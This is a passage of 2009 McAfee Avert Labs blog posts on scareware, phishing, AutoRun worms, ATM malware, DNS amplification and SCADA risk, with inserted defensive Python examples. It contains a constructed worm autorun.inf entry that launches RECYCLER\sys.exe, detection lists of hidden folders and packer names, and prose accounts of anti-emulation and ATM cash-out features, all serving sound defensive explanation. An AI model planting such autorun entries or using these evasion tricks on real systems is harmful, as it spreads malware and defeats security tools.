    McAfee Coverage of the DirectShow Exploit

    Since we reported on the new attacks against Internet Explorer that exploit a vulnerability in a DirectShow ActiveX object, we have released DATs and coverage updates for many of our products and technologies.

    Current status for each of the content areas:

    • Malware: Coverage is provided for exploit code in the 5668 DATs, released on July 6
    • HIPS: Generic buffer overflow should provide coverage
    • McAfee Network Security Platform: Coverage was provided on July 6
    • McAfee Vulnerability Manager: Coverage was provided on July 6
    • MNAC: Coverage will be provided in the next release
    • VirusScan Enterprise: Buffer overflow protection should provide coverage
    • McAfee Web Gateway, Anti-Malware Edition: Behavior analysis provides coverage against currently known exploits

    Other Internet users and website administrators can also download the free Stinger tool to scan computers and web pages for known malware relating to this attack.

    We will continue to monitor the situation to provide comprehensive coverage.

    Fake Alerts Uncovered

    It has been almost a year since rogue anti-virus products, a.k.a. scareware, became rampant. These Trojan families are typically spread via drive-by downloads, search-engine-optimization poisoning, spam campaigns, and clever social engineering. Having discussed those methods in earlier blogs, today we look at the protection mechanisms these FakeAlert Trojan families adopt to evade detection by anti-virus vendors.

    • Code obfuscation using junk instructions

    In the above screenshot, a lot of junk code is visible between valid instructions. Junk instructions are used widely across FakeAlert families.

    • Fake API calls

    The screenshot shows a call to the API SetArcDirection, which serves no purpose in the code. Malware uses such unnecessary API calls to defeat emulation. Sometimes these families also call APIs that don’t exist, to check whether they are being emulated.

    • Customized packer

    Many FakeAlert families use their own custom packers and encryption routines. Some patch existing packers.

    • Use of XMM and MMX instruction sets

    XMM, MMX, and FPU instructions that the code does not need are also used, alongside the other junk code, by most FakeAlert families; emulators often implement these instruction sets poorly or not at all, so their presence is another way to break analysis.

    The techniques discussed above are nothing new and have been used in notable malware before. But FakeAlert Trojans use these evasion techniques to their full potential with every new variant. Just when we thought we were seeing a decline in adware and spyware, FakeAlert Trojan families have stepped in to claim the scum-of-the-Internet tag.

    Bad News Offers Opportunity to Spread Malware

    With the current news about the deaths of Farrah Fawcett and Michael Jackson, it’s a good idea to remind our readers to beware of blackhat attempts to distribute malware to anyone looking for news.

     

    Every time a disaster happens or news about some celebrity reaches the media, malware writers try to take advantage of it. The most common attack vector is email. Watch out for spam offering links to “news” or “pictures” of deceased celebrities. Most of the time, they will take you to websites offering advertisements for pharmacy products such as Viagra and Cialis or, even worse, will try to install malware on your machine!

     

    But another way to attract visitors looking for news is a technique known as search engine optimization (SEO for short, see more here). Blackhats use SEO to inflate search engine results in an attempt to put their results on top of the list and drive more users to fake websites offering “more information” about the current trendy news. When the users click on the fake links, they are susceptible to any kind of attack, spyware or malware installation, or information theft.

     

    A good way to protect against this kind of attack is to use our SiteAdvisor tool, which can be downloaded for free at this site: http://www.siteadvisor.com/. It will help you identify potentially malicious links on your search results.

     

    And again, repeat with me: No, that email will NOT show you pictures of Michael Jackson’s body; it will just install malware on your machine.

    Sex the Bait in Mass Orkut Compromise

    With the advent of Web 2.0, social networking websites have become an easy target for online fraud and other identity scams. Lately, we have seen Twitter being used to phish personal information, as well as MySpace scams and Facebook spam.

    With more than 15 percent of its traffic coming from India, Orkut is perhaps the most popular and widely used social networking website in the country. Phishers have come up with an elegant approach to social-engineer the not-so-tech-savvy users of Orkut. They have updated the profiles of several thousand compromised Orkut accounts, which now link to various phishing websites. These lure visiting users into divulging their personal information.

    The various phishing websites claim to be the “adult” variant of Orkut. The “Orkut Sex” site has been very successful in luring several thousand Orkut users into entering their credentials. The attackers use the harvested details to steal other personal information for monetary gain.


    We have observed scores of websites being used in this phishing attack. Here are a few of them:

    • http://orkutsexlogi[blocked].tk
    • http://s3x[blocked].kilu.de
    • http://orkutst[blocked].tk
    • http://album[blocked].kilu.de
    • http://priya[blocked].freehostia.com

    If you have read this far, I probably don’t need to remind you to look carefully before you enter your personal details on the web. Always make sure that you are safe and protected–and keep away from the rip-offs.

    Worms Dig Further Than Thumb Drives

    Most every day I see AutoRun worms such as this one. You may know the kind, the worms that are designed to replicate onto removable drives. There is certainly no shortage of these little monsters.

    Often the worm, although problematic itself, is just the harbinger of potential doom. More malicious malware obtained by these worms can lead to full-blown havoc–or, at a minimum, a very bad day.

    So I was thinking of potential new vectors when it hit me–there are a few right under our noses that some people just might overlook. A kind of “can’t see the forest for the trees” scenario.

    Here’s a little quiz: Which of the following devices may be susceptible to AutoRun worms?

    A) Most USB devices that you can plug into your computer that have storage

    If you answered A, you’re right! (That wasn’t hard, was it?)

    How many of you have an MP3 player? How many of you plug the device into more than one computer? Bingo, that’s a vector for replication.

    How about a digital video camera, or a digital picture frame? Yep, they can also be infected. Just imagine this one: “Here you go grandma, a picture of little Bobby. Oh, and a little surprise to go with it, as well.”

    Now, the truly paranoid (or truly cautious?) administrators have been known to swab glue into the USB connectors so that they seal off access completely. This may not be the best way to solve the problem (think disabling AutoPlay, up-to-date antivirus, enabling a firewall, etc.).

    But going down the road to prevention, however, is not the point I’m trying to make. There is already a myriad of advice on the Internet for that. All I am trying to say is that the spread of AutoRuns can go beyond the USB drives we all use to conveniently move stuff around. Devices such as MP3 players are just glorified storage drives with additional functions. One unintended aspect of this functionality may be to assist in worm propagation.
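    As an added example, not part of the original post, here is a small Python script that reads an autorun.inf the way a cautious administrator might before letting a borrowed MP3 player or camera near a machine: it tolerates the binary junk some worms put in the file to break naive INI parsers, and reports which entries would launch a program, redirect the default double-click verb, or imitate Explorer's own AutoPlay entry. The sample file and the list of hidden-folder names are constructed.

```python
import re

LAUNCH_KEYS = {"open", "shellexecute"}
SHELL_CMD_RE = re.compile(r"^shell\\[^\\]+\\command$")   # e.g. shell\open\command
HIDDEN_DIRS = ("recycler", "$recycle.bin", "system volume information")
# Action strings that imitate Explorer's own AutoPlay entry (constructed list)
EXPLORER_LIKE = {"open folder to view files",
                 "open folder to view files using windows explorer"}


def parse_autorun(text):
    """Keep key=value lines inside [autorun] and ignore everything else, including
    binary noise that would make a strict INI parser raise an error."""
    entries = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            key = key.strip().lower()
            if key and key.isprintable():
                entries[key] = value.strip()
    return entries


def assess(entries):
    """List what the file would make AutoPlay do; any finding is a reason to distrust the device."""
    findings = []
    for key, value in entries.items():
        if key in LAUNCH_KEYS or SHELL_CMD_RE.match(key):
            findings.append(f"{key} launches '{value}'")
            if any(d in value.lower() for d in HIDDEN_DIRS):
                findings.append(f"{key} points into a folder Explorer normally hides")
    if "shell" in entries:
        findings.append(f"default double-click verb redirected to '{entries['shell']}'")
    if entries.get("action", "").lower() in EXPLORER_LIKE:
        findings.append("action text imitates Explorer's own 'Open folder' entry")
    return findings


# Constructed autorun.inf of the kind a removable-drive worm leaves behind.
SAMPLE = (
    "[AutoRun]\n"
    "icon=%SystemRoot%\\system32\\shell32.dll,4\n"
    "\x00\x01junk=\x02line\n"                 # binary noise; a naive parser would choke here
    "open=RECYCLER\\sys.exe\n"
    "shell\\open\\command=RECYCLER\\sys.exe\n"
    "shell\\open=Open\n"
    "shell=open\n"
    "action=Open folder to view files\n"
)

if __name__ == "__main__":
    for finding in assess(parse_autorun(SAMPLE)):
        print("-", finding)
```

    The parser deliberately does not use configparser: the worm's author controls the file, and a parser that gives up on the first malformed line is a parser the worm can blind. Reading the file is of course no substitute for disabling AutoPlay and keeping the scanner current, as the post says; it only tells you what the device was going to try.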

    Hopefully, you do already think about these devices as a legitimate way to pass along a worm. In that case, maybe the most you got out of this little blog was some lighthearted entertainment (or at least a break from whatever you were doing).

    If you haven’t thought about this vector, though, I urge you to start now and to proceed with caution the next time you are going to offload and share that video, or grab the latest hit song.

    That way you can say, “Hold the side of ‘autorun.inf’ with my music, thank you very much.”

    ATM Malware Makes Withdrawals in Russia

    We frequently encounter password stealers and backdoors on computers after their owners have browsed unsafe websites or opened unknown email attachments. It is more unusual, however, to see such malware installed directly on banks’ automated teller machines. In these cases, the Trojans have to be installed by people with physical access to the machines, and collecting the stolen data and removing the malware requires further visits. Such an installation obviously requires a high level of “cooperation” from the bank staff.

    One of the first attacks occurred in Russia more than a year ago. It came to light in January 2009, when Diebold Inc. released a security fix for its Opteva Windows-based ATMs. At that time, the company said some suspects had been apprehended, but it seems the gang was not fully dismantled. In May, we heard of new suspicious files discovered on ATMs in Eastern Europe, and the security firm Trustwave published a study on the matter. The software had been updated and new virtual robberies had been launched. On June 3, The Register also raised public awareness by covering the story.

    When active, the Trojan intercepts transactions and records them in log files. To control an infected ATM, the attacker uses dedicated cards that unlock an administrative menu. Via the ATM’s display, he can select options from the keypad to show statistics (numbers of transactions, cards, keys), print the collected data, force the machine to dispense all its cash, uninstall the malware, and reboot the ATM. Unfortunately, I was unable to test such malware in a real environment (I do not have a spare ATM lying around), but looking at the samples is very instructive. As in the previous attacks, the targeted ATMs run the Diebold Agilis 91x software, and the attacker can examine the registry to display version information and statistics:

    Targeted currencies are the U.S. dollar, Russian ruble (RUR), and the Ukrainian Hryvnia (UAH):

    The attacker can also, through a password-protected routine, control the currency-dispensing ATM cassette:

    We are not aware of any such attacks outside Eastern Europe, but we encourage financial institutions to verify the integrity of their ATM systems. Be proactive!

    The known versions of this malware are detected by McAfee VirusScan as PWS-BoldDie. Many generic and unclassified versions can be detected under the name Generic Backdoor!bw.

    Avoid Housecalls From Rogue ‘Malware Doctor’

    Yesterday, we came across a new variant of a rogue security program. This one is called Malware Doctor, and we detect it as the FakeAlert-D Trojan with our DAT 5635.

    The new variant comes from the following web pages:
    hxxp://internetware-sa{blocked}.com/
    hxxp://mal-ware{blocked}.net

    As do most other rogue security programs, Malware Doctor displays misleading fake alerts to entice users into buying a product to “repair” malware problems.

    We also noticed some new features in Malware Doctor. Once installed, it performs a system scan:

    maldoc1

    Users see a message indicating this “unregistered” version of Malware Doctor won’t be able to heal or remove infected files and asking the user to activate it at a cost.

    maldoc2

    maldoc3

    Unlike many rogue security programs, which display excessive fake alerts, this version of Malware Doctor reports only a few detections, so users will not be very suspicious of it.

    Once this Trojan detects a supposedly malicious file, it will pop up a message:

    maldoc4

    This Trojan even makes use of McAfee’s malware naming convention:

    maldoc6

    This Trojan also displays information of supposedly known viruses whose information is taken from McAfee’s Virus Information Library.

    maldoc5

    As of today, the malicious website hosting this Trojan makes use of another AV vendor’s malware naming convention. However, the installer for this Trojan no longer exists on the Trojan’s website.

    Affected VirusScan users may remove this threat using the latest DATs and engine.

    Keep your AV signatures up to date!

    New McAfee Whitepaper on Browser Attacks

    Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

    Web Browsers: An Emerging Platform Under Attack
    “The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

    Other areas the paper covers include:

    • The shift in spam to mainly malicious web link usage

    • “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

    • Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

    • Use of malicious video banners placed in advertisement networks

    • Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

    Download the paper in its entirety here.

    Social Engineering Aids Malware Delivery

    Earlier today the nice folks at SANS blogged about a malware campaign dressed up as a digital-certificate update for Bank of America. The malicious link contained the substring “bankofamerica.com” and took you to a Web page rigged to mimic Bank of America’s Web page:
    Bank of America phish
    If you clicked on “Update Certificate,” a certifiably nasty piece of malware was served to you under the filename sophialite.exe.

    Did you install this “certificate” by accident? Worry not. We have proactively detected this file as Spam-Mailbot.m since the 5631 DATs, released on May 30. Further, we have added detection for the file that it drops into C:\Windows\system32\sdra64.exe as PWS-Zbot and memory cleaning for the same as Spy-Agent.bw.gen!mem. This will make it to the DATs after Wednesday, June 3.

    The takeaway from today’s social-engineering attack: if you receive a suspicious email claiming to come from your bank, do not follow the links in it! Visit banking-related websites only through your own bookmarks. In the second step of today’s attack, cautious users could have spotted the deception by noticing that the “Secure Area” sign did not match the plain, nonsecure HTTP URL in the address bar.
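    As an added example that is not part of the original post, here is a check for the two tells described above: a brand name embedded somewhere in a link whose actual host is a different domain, and a “secure” page served over plain HTTP. It also catches the userinfo trick (text before an @ sign is not the host) and links that end in an executable. The brand list and the sample URLs are constructed; the eTLD+1 logic is deliberately naive and is noted as such in the code.

```python
import ipaddress
from urllib.parse import urlsplit

# Registered domains the user actually does business with (constructed).
BRANDS = {"bankofamerica.com"}
EXECUTABLE_EXTS = (".exe", ".scr", ".pif")


def registered_domain(host):
    """Naive eTLD+1 (last two labels). Fine for .com; production code should use
    the Public Suffix List so that 'bank.co.uk' is not reduced to 'co.uk'."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def assess_link(url, brands=BRANDS):
    """Return the reasons a link should not be trusted; an empty list means no red flags."""
    findings = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.username is not None:
        findings.append("text before '@' is a username, not the site; the browser ignores it")
    try:
        ipaddress.ip_address(host)
        is_ip = True
        findings.append("host is a bare IP address")
    except ValueError:
        is_ip = False
    site = host if is_ip else registered_domain(host)
    for brand in sorted(brands):
        if brand in url.lower() and site != brand:
            findings.append(f"'{brand}' appears in the link but the site is actually '{site or 'unknown'}'")
    if parts.scheme.lower() != "https":
        findings.append("plain HTTP: a 'Secure Area' badge on the page means nothing")
    if parts.path.lower().endswith(EXECUTABLE_EXTS):
        findings.append("the link serves an executable, not a certificate")
    return findings


if __name__ == "__main__":
    # Constructed URLs: the genuine site, a lookalike host, and the userinfo trick.
    for u in ("https://www.bankofamerica.com/",
              "http://www.bankofamerica.com.cert-update.example.net/update/certificate.exe",
              "http://bankofamerica.com@203.0.113.5/update"):
        print(u, assess_link(u))
```

    The brand check is the one that matters most in practice: users read “bankofamerica.com” somewhere in the link and stop reading, while the browser only cares about the registered domain at the end of the host name.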

    Psychologists would term the tricks employed above as abuses of the “exposure effect” and “anchoring.” For some background on these terms, have a peek at my article on the psychology of social engineering in the Fall 2008 edition of McAfee Security Journal. Happy reading :) .

    McAfee Releases June Spam Report

    Today we released our Spam Report for the month of June. In it we discuss two key findings:

    President Obama’s First 100 Days of Spam
    Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

    Identifying Spam Trends of the Future
    Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

    What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

    Who Digs the Elephant Trap?

    It is ironic, but the rapid growth rate of malware attacks is partly due to how successful AV technology has become. If AV scanners were not so successful in blocking Trojans and viruses, there would be little need for the bad guys to write new ones. One can even say that malware writers are digging an elephant trap for all computer users because lots of new malware demands a response from AV, which can contribute to the slower operation of computers for all of us.

    Figuratively speaking, the primary tools that the bad guys are using to dig their side of the trap and evade detection are packers (like UPX and Petite) and protectors (like Armadillo and Themida). Packers are legitimately used to reduce the size of programs (saving disk space), while protectors are legitimately used to prevent patching, hacking or reverse engineering. For malware production, however, packers and protectors are useful as they can often obfuscate original malware beyond recognition by AV.

    Commercial protectors are especially loved by malware writers because they can put a protective envelope on top of, say, their spam-bot and it will be well hidden inside. Additionally, it will now really look more like a legitimate file obfuscated with the same protector. Malware writers use this trick more and more frequently.

    As a result, on any average computer, AV can frequently encounter, say, a Themida-packed computer game and a Themida-packed spam bot. To determine which is which, an AV product has to know what is “under” the protecting envelope. Unfortunately, this simply cannot be done very quickly: it takes computing cycles.
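    As an added example, not from the original post, here is the simplest form of the “look under the envelope” problem: a byte-entropy heuristic of the kind AV engines use to decide that a section is compressed or encrypted and therefore needs deeper, slower analysis. It shows why a packed game and a packed bot look alike from the outside. The packer section names and the two fake files are constructed; the 7.0 threshold is an assumption drawn from common practice, not a McAfee figure.

```python
import math
import random

PACKED_THRESHOLD = 7.0     # bits per byte; compressed or encrypted data sits above this
# Section names left behind by common packers (partial, constructed list).
PACKER_SECTIONS = {"UPX0", "UPX1", ".petite"}


def shannon_entropy(data):
    """Bits of information per byte: 0.0 for a run of one value, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_packed(sections):
    """sections: list of (name, bytes). A file is flagged when more than half of its
    bytes live in high-entropy sections or a section name matches a known packer."""
    total = sum(len(d) for _, d in sections) or 1
    high = sum(len(d) for _, d in sections if shannon_entropy(d) > PACKED_THRESHOLD)
    names = [n for n, _ in sections if n in PACKER_SECTIONS]
    return {
        "high_entropy_fraction": round(high / total, 3),
        "packer_sections": names,
        "packed": high / total > 0.5 or bool(names),
    }


def constructed_samples(seed=7):
    """Two fake files: one whose code section is pseudo-random bytes (what a protector's
    envelope looks like), one whose sections are ordinary text. Constructed, not real binaries."""
    rng = random.Random(seed)
    envelope = bytes(rng.getrandbits(8) for _ in range(4096))
    text = b"the quick brown fox jumps over the lazy dog " * 100
    packed = [(".text", envelope), (".rsrc", text[:1500])]
    plain = [(".text", text), (".rsrc", text[:1500])]
    return packed, plain


if __name__ == "__main__":
    packed, plain = constructed_samples()
    print("packed:", looks_packed(packed))
    print("plain: ", looks_packed(plain))
```

    The heuristic tells the scanner only that it cannot classify the file cheaply; the expensive part, emulating or unpacking to see what is inside, is exactly the slowdown the post warns about. A valid digital signature is what lets a scanner skip that step with some confidence, which is why the advice to sign protected files matters.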

    We would urge all developers who use software protection to think twice before doing so. There is an increasing risk that your legitimate files will be blocked by AV software by mistake or that there will be an unpleasant slowdown due to long analysis. Either can cause troubles for users. If you feel that you really must use an obfuscating protector at least digitally sign your files. That would reduce the level of suspicion by introducing traceability to the source.

    The point is that software protectors are no longer a secure software technology, because they have been misused so much. Do not use them if you can avoid it.

    Bad Program Logic Amplifies Baofeng Attack

    A distributed denial-of-service (DDoS) attack on the DNS servers of a domain registrar, coupled with bad program logic in a popular media application, caused network outages in parts of China last week.

    Baofeng is a widely used media player in China, with a total of 200 million users and several million online simultaneously. The player starts when Windows boots and connects to Baofeng’s online servers; to find them it sends DNS queries, and it keeps querying until it gets an answer. Because of its massive number of online users, it would be a powerful DDoS tool if all running Baofeng instances sent continuous DNS queries at the same time, especially when the authoritative DNS server cannot answer them.

    Several DNS servers of DNSPod (a Chinese domain service provider and registrar) were hit by a DDoS attack on the night of May 18 and became inaccessible. The assault was meant as a targeted attack against one company, but Baofeng.com was also a DNSPod customer, and its authoritative DNS server was among those under attack. Because of the design flaw in Baofeng’s media player, all running Baofeng instances started sending DNS queries continuously once the responses cached by recursive resolvers expired on May 19. The massive number of DNS queries flooded the network of China Telecom (one of the biggest ISPs in China), and as a result users in parts of China were unable to access websites.

    The initial DDoS attack, which targeted a specific domain registrar, was thus transformed into a DDoS attack on almost all DNS servers in China. It shows how a bad design in a client program can “help” the attacker(s) amplify an attack.
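    As an added example, not from the original post, here is a simulation that puts numbers on the retry logic described above and compares it with a client that backs off and caches the failure. The clock is simulated, nothing is sent on the network, and the timeouts, retry limit, and 300-second negative TTL are assumptions chosen for the illustration.

```python
import random


class Naive:
    """What the post describes: send a query, time out, send another, forever."""

    def __init__(self, timeout=1.0):
        self.timeout = timeout

    def next_wait(self, rng):
        return self.timeout


class Backoff:
    """Exponential backoff with jitter; after max_attempts failures the client
    treats the name as unresolvable for negative_ttl seconds before trying again."""

    def __init__(self, base=1.0, cap=64.0, max_attempts=5, negative_ttl=300.0):
        self.base, self.cap = base, cap
        self.max_attempts, self.negative_ttl = max_attempts, negative_ttl
        self.attempt = 0

    def next_wait(self, rng):
        self.attempt += 1
        if self.attempt > self.max_attempts:
            self.attempt = 0
            return self.negative_ttl
        ceiling = min(self.cap, self.base * 2 ** (self.attempt - 1))
        # "equal jitter": wait between half the ceiling and the ceiling, so retries
        # from millions of clients do not line up on the same second
        return ceiling / 2 + rng.uniform(0, ceiling / 2)


def queries_per_client(policy, window=3600.0, seed=1):
    """Count queries one client sends during `window` seconds while the authoritative
    server never answers (simulated clock, no real network traffic)."""
    rng = random.Random(seed)
    t, queries = 0.0, 0
    while t < window:
        queries += 1
        t += policy.next_wait(rng)
    return queries


def fleet_qps(policy_factory, clients, window=3600.0):
    """Aggregate query rate a fleet of identical clients puts on the resolvers."""
    return queries_per_client(policy_factory(), window) * clients / window


if __name__ == "__main__":
    for name, factory in (("naive", Naive), ("backoff", Backoff)):
        print(name, queries_per_client(factory()), "queries/hour per client;",
              f"{fleet_qps(factory, 5_000_000):,.0f} qps from five million clients")
```

    With the naive policy, five million clients that cannot resolve one name generate five million queries per second against whatever resolvers sit in front of them; with backoff and negative caching the same fleet stays under a hundred thousand. The outage the post describes is the difference between those two numbers.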

    Urban ‘Attack’ on Infrastructure

    Supervisory Control and Data Acquisition, or SCADA, stands for large-scale distributed remote processing systems that gather data in real time to control critical industrial, infrastructure, or facility processes and equipment. SCADA is used in power plants as well as in oil and gas refining, telecommunications, transportation, and water and waste control.

    Stories about intruders who damage the power grid or other key SCADA infrastructure frequently make the headlines. In the past, as in Mexico in 2007, extraterrestrial creatures and flying saucers were occasionally blamed.

    Since then, our enemies have changed. The Wall Street Journal reported in April that, according to a federal audit, critical infrastructure facilities in the U.S. power industry had been compromised with software that would allow attackers to disable key elements of the national power grid. “The Chinese have attempted to map our infrastructure, such as the electrical grid,” a senior U.S. intelligence official said on the occasion. One year ago, the CIA claimed that a cyberattack had caused a multicity power outage at an unspecified location outside the United States. The CIA story broke on May 14. It’s rumored that Hydro-Quebec was also a target of cyberspies.

    Last week, I discovered a video posted on YouTube in November 2008.
    We can see two guys hacking a central light system and then playing space invaders on it!

    I have some doubts about the technical aspects of these light-show “attacks” on unprepared buildings. But fake or not, the video confirms that hackers and cybercriminals have got their eyes on SCADA networks. Perhaps the first demo was just for fun, but the others will have less juvenile goals. An attack can involve nationwide damage, a terrible effect on the public’s morale, and huge financial losses. Modern SCADA networks are more vulnerable than ever because they use open networking standards (such as TCP/IP), are now deployed under less secure operating systems (Windows), are connected to other networks (including Internet), and cannot be easily updated and rebooted.

    For SCADA, which typically allows only a closely defined list of applications to run, a security approach that includes whitelisting can be a good solution. McAfee’s recent acquisition of Solidcore will help our customers in this area.
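    As an added example that is not part of either post, here is the audit half of the allow-listing approach, serving both the ATM advice above (“verify the integrity of their ATM systems”) and the SCADA point about hosts that run a closely defined list of applications: record a baseline of executable hashes on a system that should never change, then report anything added, modified, or missing. The directory layout and file names are constructed; a real deployment would sign the baseline, store it off the host, and enforce it at execution time rather than merely audit.

```python
import hashlib
import os
import tempfile

EXEC_EXTS = (".exe", ".dll", ".sys", ".ocx")


def file_sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path -> SHA-256 for every executable-looking file under root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(EXEC_EXTS):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                baseline[rel] = file_sha256(full)
    return baseline


def verify(root, baseline):
    """Return (added, modified, missing) executables compared with the recorded baseline.
    An allow-listing agent would refuse to run anything in `added` or `modified`."""
    current = build_baseline(root)
    added = sorted(set(current) - set(baseline))
    missing = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(current) & set(baseline) if current[p] != baseline[p])
    return added, modified, missing


def _write(root, rel, data):
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def demo():
    """Constructed scenario: record a baseline, then simulate what a visit by a
    dishonest technician leaves behind and report the differences."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "app/cash_dispenser.dll", b"MZ original dispenser module")
        _write(root, "app/ui.exe", b"MZ original user interface")
        _write(root, "app/readme.txt", b"not executable, not tracked")
        baseline = build_baseline(root)
        _write(root, "app/cash_dispenser.dll", b"MZ patched dispenser module")  # modified
        _write(root, "app/svc.exe", b"MZ unknown program")                       # added
        os.remove(os.path.join(root, "app", "ui.exe"))                            # missing
        return verify(root, baseline)


if __name__ == "__main__":
    added, modified, missing = demo()
    print("added:   ", added)
    print("modified:", modified)
    print("missing: ", missing)
```

    The point of hashing rather than checking timestamps or file sizes is that a technician with physical access can set those to anything; the hash of a patched dispenser module cannot be made to match the original without the original.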

    Fight Against Cybercrime Gets Organized

    The fight against cybercrime has shown some very promising progress over the last few years. We are certainly not where we want to be, but we’re on a good path. McAfee’s own Initiative to Fight Cybercrime has been in force for more than half a year. Recently our Cybercrime Response Unit was launched; it’s an online help center designed to assist victims (and people who suspect they may be victims) of cybercrime. But best of all: we are not alone!

    McAfee has teamed with many other companies and institutions to form the Conficker Working Group and has set a precedent that raises hope for the future. Just this week I attended the Counter eCrime Operations Summit (CeCOS) in Barcelona, Spain. The event was hosted by the Anti-Phishing Working Group (APWG). This year’s meeting focused on the development of response paradigms and resources for managers and forensic professionals who fight ecrime. There were a number of very useful presentations and panels on user education, better interaction among various entities, and case studies on how successful this can be.

    Even more important were the small meetings outside the official program, connecting researchers from security companies, CERTs, and law enforcement agencies throughout the world and talking over how we can improve the current situation. This has been a very productive week. At least I now have some hope for the future! ;)

    FakeAlert Trojan Holds Systems For Ransom

    In March 2009, we notified our customers of a new variant of the infamous Vundo Trojan family, which we detected as Ransom-F, and raised its risk assessment to a Low-Profiled threat. It was possibly the first indicator of a shift in the FakeAlert criminal model from instilling fear to holding information technology resources for ransom, but certainly not the last.

    Last week, we came across a new variant of a rogue security program branded by its creators as “System Security 2009”. We detect it as FakeAlert-CO, and some of its similarly branded predecessors as FakeAlert-SystemSecurity.

    The updated variants were discovered on a web page hosted on trustedw{blocked}security.com. Like most other rogue security programs to date, FakeAlert-CO displays spurious alerts and makes fraudulent claims of infections that require the user to pay a fee to “repair”. Following the trend set by Ransom-F, we noticed “new features” in FakeAlert-CO that resemble common characteristics of ransomware Trojans.

    Once installed, FakeAlert-CO either terminates all running user processes or prompts the user to reboot.

    In either case, it then pretends to perform a system scan and reports false and exaggerated threat detections.

    What sets it apart from older variants is that the user is no longer allowed to open or run any application: Task Manager, Command Prompt, and other system and office applications are terminated by FakeAlert-CO. A message tells the user that the files are infected and that, to resolve the issue, the user must activate FakeAlert-CO at a cost.

     

     

    The “product” website is made to look fairly professional offering an option to purchase a 2-year license, or lifetime support license at a “discount” and even comes with 30-day money back guarantee!

    You may be paying for the “best” possible support option, but you can’t trust a “product” that holds your system for ransom.

    Uninstalling the System Security “product” will not be an option for the typical user: there is no uninstaller, and “Add or Remove Programs” in the Control Panel cannot be opened by the usual means.

    However, the reported infected files are intact, and are not modified in any way. If the user boots into Safe Mode, FakeAlert-CO is not started automatically and system tools and applications can be executed and accessed normally.

    Affected VirusScan users may remove this threat using the latest DATs and engine.

    McAfee Releases First-Quarter Threats Report

    Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

    Other Key Findings

    The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

    Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

    Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

    Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

    You can find the full text of the “McAfee Threats Report: First Quarter 2009″ here.

    Swine Flu Subjects and e-Pharmacy Sites

    We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

    The image below is a collection of a bunch of swine flu spams:

    Swine Flu Spams

    You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

    Here is a screenshot of the e-pharmacy they all lead to:

    Swine Flu e-Pharm Site

    You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

    As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

    Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

    The Carbon Footprint of Spam

    Today McAfee has released The Carbon Footprint of Email Spam Report. The study looks at the global energy expended to create, store, view, and filter spam across 11 countries: Australia, Brazil, Canada, China, France, Germany, India, Mexico, Spain, the United States, and the United Kingdom. The report correlates the electricity spent on spam with its carbon footprint, because fossil fuels are by far the largest source of electricity in the world today. Since emissions cannot be isolated to one country, the study averages its findings to arrive at the global impact. Key findings include:

